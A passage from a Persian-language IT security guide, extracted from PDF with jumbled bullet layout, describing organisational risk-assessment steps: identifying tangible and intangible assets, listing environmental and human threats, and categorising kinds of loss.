‫ﻛﺎﺭﮔﺎﻫﻬﺎﻱ ﺁﻣﻮﺯﺷ ﹺ‬
‫ﺑﺎﻳــﺪ ﺍﺯ ﻛــﺎﺭﺑﺮﺍﻥ ﺁﮔــﺎﻩ ﺑﺨــﺸﻬﺎﻱ ﻣﺨﺘﻠــﻒ‪ ،‬ﻣــﺪﻳﺮﺍﻥ ﻣﻴــﺎﻧﻲ ﻭ‬
‫ﻣﺪﻳﺮﺍﻥ ﺍﺟﺮﺍﻳـﻲ ﺳـﺎﺯﻣﺎﻥ ﺧـﻮﺩ ﺩﻋـﻮﺕ ﺑﻌﻤـﻞ ﺁﻭﺭﻳـﺪ؛ ﻭ ﻃـﻲ‬
‫ﺟﻠﺴﺎﺗﻲ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎ ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺭﺍ ﺗﻬﻴـﻪ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻓﺮﺁﻳﻨﺪ ﻧﻪﺗﻨﻬﺎ ﺑﻪ ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﻛﻪ ﻓﻬﺮﺳﺖ ﻛﺎﻣﻠﺘﺮﻱ ﺗﻬﻴﻪ‬
‫ﻛﻨﻴﺪ‪ ،‬ﺑﻠﻜﻪ ﺁﮔﺎﻫﻲ ﺣﻀﺎﺭ ﺍﺯ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻧﻴﺰ ﺑﺎﻻﺗﺮ ﻣﻲﺑﺮﺩ‪.‬‬
‫ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﺁﻣﺎﺭﻱ ﺑﺴﻴﺎﺭ ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺯ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ ﺑﺨﻮﺍﻫـﺪ‬
‫ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺧﺎﻧﮕﻲ ﻳﺎ ﻳﻚ ﺷـﺮﻛﺖ ﺑـﺴﻴﺎﺭ ﻛﻮﭼـﻚ‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺠﺎ‬
‫ﻣﻄﺮﺡ ﻣﻲﺷﻮﻧﺪ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﺑﺰﺭﮒ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ‬
‫‪Risk Assessment‬‬
‫‪Uninterruptible Power Supply‬‬
‫‪67‬‬
‫‪68‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫‪o‬‬
‫ﺁﻳﺎ ﻫﻤﺔ ﻛﺎﺭﻛﻨﺎﻥ ﻛﻠﻴﺪﻱ ﺑﺮﺍﻱ ﺑﻜﺎﺭ ﺑﺴﺘﻦ ﺭﻭﺍﻟﻬـﺎ‬
‫ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻧﺪ؟‬
‫ﺁﻳــﺎ ﻛﺎﺭﻛﻨــﺎﻥ ﻛﻠﻴــﺪﻱ ﻭﺍﻗﻌ ـﹰﺎ ﺩﺭ ﻫﻤــﺔ ﺟﻠــﺴﺎﺕ‬
‫ﺁﻣﻮﺯﺷﻲ ﺣﻀﻮﺭ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ؟‬
‫ﺁﻳــﺎ ﺩﻟﻴــﻞ ﺍﻧﺘﺨــﺎﺏ ﻛﺎﺭﻛﻨــﺎﻥ ﻛﻠﻴــﺪﻱ‪ ،‬ﺳــﻮﺍﺑﻖ‬
‫ﺩﺭﺧﺸﺎﻥ ﺁﻧﻬﺎ ﺑﻮﺩﻩ ﺍﺳﺖ؟‬
‫ﺁﻳﺎ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺭﻭﺍﻥ ﺍﺳﺖ؟‬
‫ﻣﺮﺍﺣﻞ ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ‬
‫‪١٤٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺩﻭﻟﺘﻲ‪ ،‬ﻭ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻱ ﻣﻬﻢ ﻛﺎﻓﻲ ﻧﻴﺴﺘﻨﺪ‪ .‬ﺩﺭ ﭼﻨـﻴﻦ ﻣـﻮﺍﺭﺩﻱ‪،‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺯ ﻣﺆﺳـﺴﺎﺕ ﻣـﺸﺎﻭﺭﻩﺍﻱ ﻛـﻪ ﻣﺘﺨـﺼﺺ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ ﻫﺴﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻧـﺮﻡ‪-‬‬
‫ﻲ ﺍﺭﺯﻳﺎﺑﻲ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻧﺪ‪.‬‬
‫ﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺨﺼﺼ ﹺ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺩﺍﺭﺍﺋﻴﻬﺎ‬
‫ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺍﻗﻼﻣﻲ ﻛﻪ ﺑﻪ ﺣﻔﺎﻇﺖ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺗﻬﻴﻪ ﻛﻨﻴـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻓﻬﺮﺳﺖ ﺑﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﻃﺮﺡ ﻛـﺴﺐ ﻭ ﻛـﺎﺭ‪ ٦٩‬ﻭ ﺩﺍﻧـﺶ ﻋﺮﻓـﻲ‬
‫ﺷــﻤﺎ ﺗﻨﻈــﻴﻢ ﺷــﻮﺩ‪ .‬ﺍﻳــﻦ ﻓﺮﺁﻳﻨــﺪ ﻧﻴﺎﺯﻣﻨــﺪ ﺁﮔــﺎﻫﻲ ﺍﺯ ﻗــﻮﺍﻧﻴﻦ‬
‫ﻛﺎﺭﺑﺮﺩﻱ‪ ،‬ﺩﺭﻙ ﻛﺎﻣﻞ ﺗﺴﻬﻴﻼﺕ‪ ،‬ﻭ ﻋﻠـﻢ ﺑـﻪ ﮔـﺴﺘﺮﺓ ﭘﻮﺷـﺶ‬
‫ﺑﻴﻤﺔ ﺷﻤﺎ ﺍﺳﺖ‪ .‬ﺍﻗﻼﻡ ﺗﺤﺖ ﺣﻔﺎﻇﺖ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻠﻤـﻮﺱ )ﻣﺜـﻞ‬
‫ﺩﻳﺴﻚﮔﺮﺩﺍﻧﻬﺎ‪ ،‬ﺻﻔﺤﺎﺕ ﻧﻤﺎﻳﺶ‪ ،‬ﻛﺎﺑﻠﻬﺎﻱ ﺷﺒﻜﻪ‪ ،‬ﺗﺠﻬﻴﺰﺍﺕ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‪،‬‬
‫ﻭ ﻛﺘﺎﺑﭽﻪﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ( ﻭ ﻳﺎ ﻏﻴﺮﻣﻠﻤﻮﺱ )ﻣﺜﻞ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺭﺍﻳﺎﻧـﻪ‪ ،‬ﺭﻣـﺰ‬
‫ﻋﺒﻮﺭ ﺍﺻﻠﻲ‪ ،‬ﺗﻮﺍﻧﺎﻳﻲ ﺍﺩﺍﻣﺔ ﭘﺮﺩﺍﺯﺵ‪ ،‬ﻓﻬﺮﺳﺖ ﻣـﺸﺘﺮﻳﺎﻥ‪ ،‬ﻭﺟﻬـﺔ ﻋﻤـﻮﻣﻲ‪ ،‬ﻭ‬
‫ﺍﻋﺘﺒﺎﺭ ﺩﺭ ﺻﻨﻌﺖ( ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﻓﻬﺮﺳﺖ ﺑﺎﻳﺪ ﻫﺮ ﭼﻴـﺰﻱ ﻛـﻪ ﺑـﺮﺍﻱ‬
‫ﺷﻤﺎ ﺍﺭﺯﺷﻤﻨﺪ ﺍﺳﺖ ﺭﺍ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ‪ .‬ﺑـﺮﺍﻱ ﺗـﺸﺨﻴﺺ ﺍﺭﺯﺷـﻤﻨﺪ‬
‫ﺑﻮﺩﻥ ﻫﺮ ﻣﻮﺭﺩ‪ ،‬ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺗﺨﺮﻳﺐ ﻳﺎ ﻓﻘـﺪﺍﻥ‬
‫ﺁﻥ‪ ،‬ﭼﻪ ﻫﺰﻳﻨﻪﻫﺎﻱ ﺯﻣﺎﻧﻲ ﻭ ﭘﻮﻟﻲ ﺑﺮﺍﻱ ﺗﻌﻤﻴﺮ ﻳﺎ ﺟـﺎﻳﮕﺰﻳﻨﻲ ﺁﻥ‬
‫ﺑﻪ ﺷﻤﺎ ﺗﺤﻤﻴﻞ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﻣﻮﺍﺭﺩﻳﻜﻪ ﺑﻄﻮﺭ ﺣﺘﻢ ﺑﺎﻳـﺪ ﺩﺭ‬
‫ﻓﻬﺮﺳﺖ ﺍﺭﺯﻳﺎﺑﻲ ﺷﻤﺎ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﻣﻮﺍﺭﺩ ﻣﻠﻤﻮﺱ‪:‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ؛‬
‫ﺩﺍﺩﻩﻫﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ؛‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻭ ﺑﺎﻳﮕﺎﻧﻲ؛‬
‫ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎ‪ ،‬ﺭﺍﻫﻨﻤﺎﻫﺎ ﻭ ﻛﺘﺎﺑﻬﺎ؛‬
‫ﻧﺴﺨﻪﻫﺎﻱ ﭼﺎﭘﻲ؛‬
‫ﻭﺳﺎﻳﻞ ﺗﻮﺯﻳﻊ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ؛‬
‫ﻭﺳﺎﻳﻞ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﻛﺎﺑﻞﻛﺸﻲﻫﺎ؛‬
‫ﺳﻮﺍﺑﻖ ﻛﺎﺭﻛﻨﺎﻥ؛ ﻭ‬
‫ﺍﺳﻨﺎﺩ ﺣﺴﺎﺑﺮﺳﻲﺷﺪﻩ‪.‬‬
‫‪ o‬ﺣﺴﻦ ﻧﻴﺖ ﻣﺸﺘﺮﻳﺎﻥ؛‬
‫ﻥ ﭘﺮﺩﺍﺯﺵ؛ ﻭ‬
‫‪ o‬ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩ ‪‬‬
‫‪ o‬ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﭘﻴﻜﺮﺑﻨﺪﻱ‪.‬‬
‫ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺠﺎﻱ ﺗﻮﺟﻪ ﺻﺮﻑ ﺑﻪ ﺟﻨﺒﻪﻫـﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‪ ،‬ﻧﮕﺮﺷـﻲ‬
‫ﻭﺳﻴﻌﺘﺮ ﺑﻪ ﺍﻗﻼﻡ ﻓﻮﻕ ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﻣﺮﺑﻮﻃﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ‪ .‬ﺍﮔـﺮ‬
‫ﺷﻤﺎ ﻧﮕﺮﺍﻥ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻫﺴﺘﻴﺪ ﻛﻪ ﻛﺴﻲ ﺑﺘﻮﺍﻧﺪ ﮔﺰﺍﺭﺷﺎﺕ ﻣﺎﻟﻲ‬
‫ﺷﻤﺎ ﺭﺍ ﻣﻄﺎﻟﻌﻪ ﻛﻨﺪ‪ ،‬ﺷﻴﻮﺓ ﺩﺳﺘﺮﺳﻲ ﺁﻥ ﻓﺮﺩ ﺑﻪ ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ‬
‫)ﭼﻪ ﺍﺯ ﻃﺮﻳﻖ ﻧﺴﺨﻪﻫﺎﻱ ﻛﺎﻏﺬﻱ ﭼﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﭼـﻪ ﺍﺯ‬
‫ﻃﺮﻳﻖ ﺩﺳﺘﺮﺳﻲ ﻣﺴﺘﻘﻴﻢ ﺑﻪ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ( ﺍﺯ ﺍﻫﻤﻴـﺖ ﺧﺎﺻـﻲ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺖ ﻭ ﻛﻠﻴﺔ ﺭﺍﻫﻬﺎ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺑﺎﻳـﺪ‬
‫ﻣﺴﺪﻭﺩ ﺷﺪﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﺗﻬﺪﻳﺪﺍﺕ‬
‫ﻣﺮﺣﻠﺔ ﺑﻌﺪﻱ ﺗﻌﻴﻴﻦ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ ﺑﺮﺍﻱ ﺩﺍﺭﺍﻳـﻲ‬
‫ﺷﻤﺎ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﺗﻬﺪﻳـﺪﺍﺕ ﻣﺤﻴﻄـﻲ ﻫـﺴﺘﻨﺪ ﻭ ﺷـﺎﻣﻞ‬
‫ﺁﺗﺶﺳﻮﺯﻱ‪ ،‬ﺯﻟﺰﻟﻪ‪ ،‬ﺍﻧﻔﺠﺎﺭ ﻭ ﺳﻴﻞ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﻓﻬﺮﺳﺘﻬﺎ ﺑﺎﻳـﺪ‬
‫ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩ ﺑﺴﻴﺎﺭ ﻧﺎﺩﺭ ﺍﻣﺎ ﻣﻤﻜﻦ ﻫﻢ ﺑﺎﺷﻨﺪ؛ ﻣﺜﻞ ﺑـﺮﻭﺯ ﻧﻘـﺺ‬
‫ﻛﻠﻲ ﺩﺭ ﺳﺎﺧﺘﻤﺎﻥ ﻳﺎ ﭘﻴﺪﺍﺷﺪﻥ ﻣﻮﺍﺩ ﺁﺗـﺸﺰﺍ ﺩﺭ ﺩﻳﻮﺍﺭﻫـﺎﻱ ﺍﺗـﺎﻕ‬
‫ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺭﺍ ﺑﺮﺍﻱ ﻣﺪﺗﻲ ﻧﻪﭼﻨﺪﺍﻥ ﻛﻮﺗﺎﻩ ﻭﺍﺩﺍﺭ‬
‫ﺑﻪ ﺗﺨﻠﻴﺔ ﺍﺗﺎﻕ ﻧﻤﺎﻳﺪ‪ .‬ﺳﺎﻳﺮ ﺗﻬﺪﻳﺪﺍﺕ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﺍﻓـﺮﺍﺩ ﺧـﺎﺭﺝ‬
‫ﺳﺎﺯﻣﺎﻥ ﻧﺸﺄﺕ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ ﻣﺜﺎﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺍﻳﻦ ﺩﺳـﺘﻪ ﺍﺯ‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﺫﻛﺮ ﺷﺪﻩﺍﻧﺪ‪:‬‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﻣﻮﺍﺭﺩ ﻏﻴﺮﻣﻠﻤﻮﺱ‪:‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫‪o‬‬
‫•‬
‫•‬
‫ﺍﻣﻨﻴﺖ ﻭ ﺳﻼﻣﺖ ﻛﺎﺭﻛﻨﺎﻥ؛‬
‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ؛‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭﻛﻨﺎﻥ؛‬
‫ﻭﺟﻬﺔ ﻋﻤﻮﻣﻲ ﻭ ﺍﻋﺘﺒﺎﺭ ﺳﺎﺯﻣﺎﻥ؛‬
‫•‬
‫•‬
‫•‬
‫•‬
‫‪Business Plan‬‬
‫‪69‬‬
‫ﺑﻴﻤﺎﺭﻱ ﺍﻓﺮﺍﺩ ﻛﻠﻴﺪﻱ؛‬
‫ﺑﻴﻤﺎﺭﻱ ﻫﻤﺰﻣﺎﻥ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﻛﻨـﺎﻥ )ﻧﻈﻴـﺮ ﺑﻴﻤﺎﺭﻳﻬـﺎﻱ‬
‫ﻣﺴﺮﻱ ﻣﺜﻞ ﺁﻧﻔﻮﻻﻧﺰﺍ(؛‬
‫ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﭘﺮﺳﻨﻞ ﻛﻠﻴﺪﻱ )ﻣـﺮﮒ‪ ،‬ﺑﺎﺯﻧﺸـﺴﺘﮕﻲ‪ ،‬ﭘﺎﻳـﺎﻥ‬
‫ﻳﺎﻓﺘﻦ ﺩﻭﺭﺓ ﻛﺎﺭﻱ(؛‬
‫ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻦ ﻳﺎ ﺷﺒﻜﻪ؛‬
‫ﻗﻄﻊ ﺧﺪﻣﺎﺕ ﺷﻬﺮﻱ )ﺗﻠﻔﻦ‪ ،‬ﺑﺮﻕ‪ ،‬ﺁﺏ( ﺑﺮﺍﻱ ﻣﺪﺗﻲ ﻛﻮﺗﺎﻩ؛‬
‫ﻗﻄﻊ ﺧﺪﻣﺎﺕ ﺷﻬﺮﻱ ﺑﺮﺍﻱ ﻣﺪﺕ ﻃﻮﻻﻧﻲ؛‬
‫ﺻﺎﻋﻘﻪ؛‬
‫ﺳﻴﻞ؛‬
‫ﺳﺮﻗﺖ ﺩﻳﺴﻜﻬﺎ ﻳﺎ ﻧﻮﺍﺭﻫﺎ؛‬
‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﺔ ﻛﻴﻔﻲ ﻳﻚ ﻓﺮﺩ ﻛﻠﻴﺪﻱ؛‬
‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﺔ ﺧﺎﻧﮕﻲ ﻳﻚ ﻓﺮﺩ ﻛﻠﻴﺪﻱ؛‬
‫ﻭﺭﻭﺩ ﻳﻚ ﻭﻳﺮﻭﺱ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ؛‬
‫ﻭﺭﺷﻜـﺴﺘﮕﻲ ﻓﺮﻭﺷــﻨﺪﮔﺎﻥ ﻳـﺎ ﺷــﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋـﻪﺩﻫﻨــﺪﺓ‬
‫ﺧﺪﻣﺎﺕ ﻛﻠﻴﺪﻱ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎ ﺷﻤﺎ؛‬
‫‪١٤٣‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﺍﺷﻜﺎﻻﺕ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ؛‬
‫ﺍﺷﻜﺎﻻﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ؛‬
‫ﺧﺮﺍﺑﻜﺎﺭﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ؛‬
‫ﻼ ﻛﺎﺭﻣﻨـﺪ ﺑﺨـﺶ‬
‫ﺧﺮﺍﺑﻜﺎﺭﻱ ﭘﺮﺳـﻨﻞ ﺷـﺨﺺ ﺛﺎﻟـﺚ )ﻣـﺜ ﹰ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ(؛‬
‫ﺍﻏﺘﺸﺎﺵ ﻛﺎﺭﻛﻨﺎﻥ؛‬
‫ﻣﻬﺎﺟﻤﻴﻨﻲ ﻛﻪ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ ﺑـﻪ ﻣﺎﺷـﻴﻨﻬﺎﻱ ﺷـﻤﺎ‬
‫ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ؛‬
‫ﻛــﺎﺭﺑﺮﺍﻧﻲ ﻛــﻪ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧــﺖ ﺍﻃﻼﻋــﺎﺕ ﺳــﺎﺯﻣﺎﻧﻲ‬
‫ﺗﺤﺮﻳﻚﻛﻨﻨﺪﻩ ﻳﺎ ﺍﻧﺤﺼﺎﺭﻱ ﻣﻲﻓﺮﺳﺘﻨﺪ؛ ﻭ‬
‫ﺟﺎﺳﻮﺳﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﺔ ﺗﺠﺎﺭﻱ‪.‬‬
‫ﻣﺤﺎﺳﺒﺔ ﻣﺨﺎﻃﺮﺍﺕ‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫•‬
‫ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ‬
‫•‬
‫ﺗﻌﻴﻴﻦ ﻫﺰﻳﻨﺔ ﺧﺴﺎﺭﺗﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﻴﺎﺭ ﺳـﺨﺖ ﺑﺎﺷـﺪ‪ .‬ﻳـﻚ‬
‫ﺷﻴﻮﺓ ﺳﺎﺩﺓ ﻣﺤﺎﺳﺒﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺗﻨﻬﺎ ﻫﺰﻳﻨﺔ ﺗﻌﻤﻴﺮ ﻳﺎ ﺗﻌـﻮﻳﺾ‬
‫•‬
‫ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﻮﺩﻥ ﺩﺭ ﻛﻮﺗﺎﻩﻣﺪﺕ )ﻛﻤﺘﺮ ﺍﺯ ‪ ۷‬ﺗﺎ ‪ ۱۰‬ﺭﻭﺯ(؛‬
‫ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﻮﺩﻥ ﺩﺭ ﻣﻴﺎﻥﻣﺪﺕ )‪ ۱‬ﺍﻟﻲ ‪ ۲‬ﻫﻔﺘﻪ(؛‬
‫ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﻮﺩﻥ ﺩﺭ ﺩﺭﺍﺯﻣﺪﺕ )ﺑﻴﺶ ﺍﺯ ‪ ۲‬ﻫﻔﺘﻪ(؛‬
‫ﺯﻳﺎﻥ ﻳﺎ ﺗﺨﺮﻳﺐ ﺩﺍﺋﻤﻲ؛‬
‫ﺯﻳﺎﻥ ﻳﺎ ﺗﺨﺮﻳﺐ ﺗﺼﺎﺩﻓﻲ؛‬
‫ﺯﻳﺎﻥ ﻳﺎ ﺗﺨﺮﻳﺐ ﺗﻌﻤﺪﻱ؛‬
‫ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻭﻥ ﺳﺎﺯﻣﺎﻥ؛‬
‫ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ؛‬
‫ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﻭ ﻛﺎﻣﻞ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ ﻫﻤـﺔ ﻣﻨـﺎﺑﻊ‬
‫ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﺭﻗﺒﺎ ﻭ ﻣﻄﺒﻮﻋﺎﺕ؛ ﻭ‬
‫ﻫﺰﻳﻨﺔ ﺟﺎﻳﮕﺰﻳﻨﻲ ﻳﺎ ﺗﺮﻣﻴﻢ‪.‬‬
‫ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﻥ‬
‫‪۷۰‬‬
‫ﺗﻐﻴﻴﺮﺍﺕ ﺩﺭ ﻛﺎﺭﻛﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺳﺘﺨﺪﺍﻡ ﻭ ﺑﺎﺯﻧﺸﺴﺘﮕﻲ ﺗﻌﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺍﺯ‬
‫ﺍﻓﺮﺍﺩ ﺑﺎﺷﺪ‪ ،‬ﻳﺎ ﺑﺎﺯﻧﺸﺴﺘﮕﻲ ﻳﻜﻲ ﺍﺯ ﻛﺴﺎﻧﻴﻜﻪ ﺩﺭ ﻃﺮﺡ ﺍﻣﻨﻴـﺖ ﺳـﺎﺯﻣﺎﻥ‬
‫ﻓﻌﺎﻟﻴﺖ ﺩﺍﺷﺘﻪ ﺍﺳـﺖ‪ .‬ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﻧـﺼﺐ ﭼﻨـﺪ‬
‫ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪ ﺑﺎﺷﺪ‪ .‬ﺍﮔﺮ ‪ ۱۰۰‬ﺭﺍﻳﺎﻧﻪ ﺩﺍﺭﻳﺪ ﻭ ﺑﺎ ﺭﻋﺎﻳﺖ ﺍﺻﻮﻝ ﺍﻳﻤﻨﻲ ‪۱‬‬
‫ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺿﺎﻓﻪ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﻣﺠﺪﺩ ﻣﺨـﺎﻃﺮﺍﺕ ﺿـﺮﻭﺭﻱ‬
‫ﻼ ‪ ۱۰‬ﺭﺍﻳﺎﻧﻪ ﺩﺍﺭﻳﺪ ﻭ ‪ ۱۰‬ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮ ﺍﺿﺎﻓﻪ ﻣﻲﻛﻨﻴﺪ‪،‬‬
‫ﻧﻴﺴﺖ‪ ،‬ﺍﻣﺎ ﺍﮔﺮ ﻣﺜ ﹰ‬
‫ﻼ ﺟﺪﻳـﺪ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ‬
‫ﺍﻳﻦ ﺗﻮﺳﻌﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﺟﻨﺒـﺔ ﻛـﺎﻣ ﹰ‬
‫ﺑﻮﺟﻮﺩ ﺑﻴﺎﻭﺭﺩ‪ .‬ﺗﻐﻴﻴﺮﺍﺕ ﺩﻳﮕﺮ ﺳﻴﺴﺘﻤﻬﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺷـﺎﻣﻞ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ‬
